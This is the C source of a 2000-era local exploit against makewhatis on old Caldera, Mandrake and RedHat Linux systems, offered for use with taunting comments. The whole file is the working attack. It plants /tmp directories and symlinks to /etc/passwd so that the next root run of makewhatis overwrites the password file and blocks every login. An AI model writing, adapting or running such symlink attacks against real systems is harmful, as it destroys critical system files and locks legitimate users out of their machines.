/* mw-exp.c                                 makewhatis exploit */                         
/* grazer@hit2000.org <-- mail comments..                [2000]*/
/* After running this file.. wait (one day on caldera system)  */
/* until makewhatis is ran again                         [2000]*/
/* when it is ran, the database will be written to /etc/passwd */
/* making it impossible to login.                        [2000]*/
/*                                gtx to #hit2000 and #darknet */
/*                                   15-7-2000         GrAzEr1 */
/* 
  Vulnerable:
    Caldera OpenLinux 2.4 / 2.3
    Linux Mandrake 7.1 / 7.0 / 6.1 / 6.0
    RedHat Linux 6.2 / 6.1 / 6.0 / 5.2
*/

#include<stdio.h>
#define TARGET_FILE "/etc/passwd "

main()
{
  char cmd[102], temp[102], cmd2[102];
  char *mkdir = "mkdir /tmp/whatis", *w = "w", *slash = "/";
  char *symlink = "ln -s ", *whatis = "/tmp/whatis";

  int counter[102];
  int i = 0;
  while(i<=100)  /* define the range of the process id here, 
                  there might be a lot directories needed
                  to let this sploit work. (advise : 10000 ? ) */
  {	
    i++;
    counter[i]=i;
    strcpy(cmd, mkdir);
    strcpy(cmd2, symlink);
    sprintf(temp,"%d",counter[i]);
    strcat(cmd, temp);
    strcat(cmd2, TARGET_FILE);
    strcat(cmd2, whatis);
    strcat(cmd2, temp);
    strcat(cmd2, slash);
    strcat(cmd2, w);
    printf("\n Hold on. Making dirs and symlinks (/tmp) \n");
    system("clear");
    system(cmd);
    system(cmd2);            
  }
  printf (" Now sit back and relax until makewhatis is ran again.. :-)\n");
}
/*                    www.hack.co.za           [18 July 2000]*/